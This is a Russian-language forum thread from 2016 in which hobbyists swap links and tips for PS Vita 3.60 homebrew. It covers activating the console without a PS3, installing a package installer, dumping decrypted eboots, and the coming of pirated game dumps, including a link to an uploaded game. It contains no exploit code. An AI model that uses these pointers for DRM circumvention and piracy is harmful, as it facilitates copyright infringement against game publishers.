вот и более подробная инфа подоспела > Release: Vita-activator. Activate your 3.60 PS Vita without a PS3 (http://wololo.net/2016/08/20/release-vita-activator-activate-3-60-ps-vita-without-ps3/)

https://github.com/ZombieWizzard/vita-activator

SILENT-Pavel
21.08.2016, 06:18
Какой-то китаец выложил впк и дату одной японской игры на виту, отписал тут гайд и ссылка как установить:
http://4pda.ru/forum/index.php?showtopic=465175&st=6880#entry52357874

riku.kh3
21.08.2016, 06:26
Заказал себе вторую PSTV за 2900р в честь этого. Ибо уже началось. :)

SILENT-Pavel
21.08.2016, 07:15
выложили что-то для ибутов, по ссылке описание
https://github.com/joshaxey/ebootSegs

riku.kh3
21.08.2016, 07:34
выложили что-то для ибутов, по ссылке описание
https://github.com/joshaxey/ebootSegs
Если работает, то я бы сначала попробовал на той же Adventure Time. Чтобы понять, можно ли из декриптованных ELF секций собрать рабочий декриптованный eboot. Все зависит от того, на каком этапе это дампится. Если из RAM после полной "обработки" таблицей релокаций, то там все слишком перекаверкано.

akela1979
21.08.2016, 23:59
PSVita 3.61 to 3.60 Intentionally Brick carry out: Даунгрейд PS Vita возможен??? (http://www.pspx.ru/forum/showthread.php?p=1104503#post1104503)

akela1979
22.08.2016, 00:16
tutorial for installing The Legend of Heroes: Trails of Cold Steel Undub Patch for PS Vita! (https://github.com/Shinigati/LoHUndubVita/wiki)

vampula
22.08.2016, 10:32
riku.kh3, это вроде не тот инструмент. Китаец-хакер еще тестирует свой дампер-взломщик(и планирует выложить еще парочку игр, если удастся найти картриджи, с которых только и возможен дамп), пока нигде его творение не засветилось.

akela1979
22.08.2016, 19:59
О да :yahoo:, наконец после долгих мучений получилось навсегда установить ★Package Installer, без перехода в IDU Mode.
http://s11.radikal.ru/i183/1608/df/7ff8ef68c4f5.jpghttp://s013.radikal.ru/i324/1608/75/7aa7e55bff1e.jpghttp://s019.radikal.ru/i602/1608/fa/4f57164c0561.jpghttp://s020.radikal.ru/i706/1608/a0/eb4f0aea94cf.jpg

COOLERbyPSP
22.08.2016, 22:01
:unknw:
http://joxi.ru/zANYvbpIlk4qz2.png

How to enable package installer in a cex console (no idu) (https://www.reddit.com/r/vitahacks/comments/4yxvzi/how_to_enable_package_installer_in_a_cex_console/)


Did you know there was a secret combo in VitaShell? Press L+R+START

PSVident.vpk (http://www.mediafire.com/download/orisn6qdqdgdftg/PSVident.vpk)

SILENT-Pavel
23.08.2016, 09:02
Выложили наглядное видео процесса установки старого пкг инсталлера с этой инструкции:
http://wololo.net/talk/viewtopic.php?f=54&t=46699
http://hackinformer.com/PlayStationGuide/PSV/tutorials/how_to_create_the_pkg_installer_bubble.html
http://wololo.net/talk/viewtopic.php?f=50&t=38342

>Package Installer without IDU MODE fw 3 60
https://www.youtube.com/watch?v=pAodCGy_ATI

проверил все работает, походу можно потом после установки pkg пересобирать их под pkgs если нет DRM вот так:

>How to create a .pkgs from an allready installed app.
https://www.youtube.com/watch?v=I5-7-l3ZXtw

а вот так модифицировать уже установленные игры
>PSVita 3.60 ROMHACKS/SAVE EDITING - Henkaku (Part 2)
https://www.youtube.com/watch?v=RYxaeM3YWQ4

riku.kh3
23.08.2016, 12:53
выложили что-то для ибутов, по ссылке описание
https://github.com/joshaxey/ebootSegs
Собрал, попробуйте кто-нибудь.

riku.kh3
23.08.2016, 13:29
Здесь он же для дампа eboot'а из Adventure Time:
http://rgho.st/private/6hNfYhGNx/795596caebb0ad8da7c9c8d49277be0c
Запускать надо в виде патча, положив в "ux0:рatch/PCSE00582/eboot.bin". После запуска он должен сдампить "ux0:app/PCSE00582/eboot.bin" в корень ux0:

lupus
25.08.2016, 21:16
http://wololo.net/2016/08/25/not-release-hackers-now-confirmed-ps-vita-piracy/
Если коротко, то есть несколько групп, способных снять декриптованные дампы psv игр, которые можно будет запустить на HENkaku-консоли.
Механизм дампинга не раскрывают, но появление готовых к пиратке игр ИМХО, стоит ждать на трекерах в ближайшие недели и дни.

Cepera
26.08.2016, 17:14
а расскажите как работает этот DRM? Ключ для каждой игры свой? Или для каждой копии игры свой? Как его получить из лицензии?

SILENT-Pavel
26.08.2016, 17:26
Вроде все как на пс3, только нет доступа к ключам - поэтому как работает знаем а сломать нечем.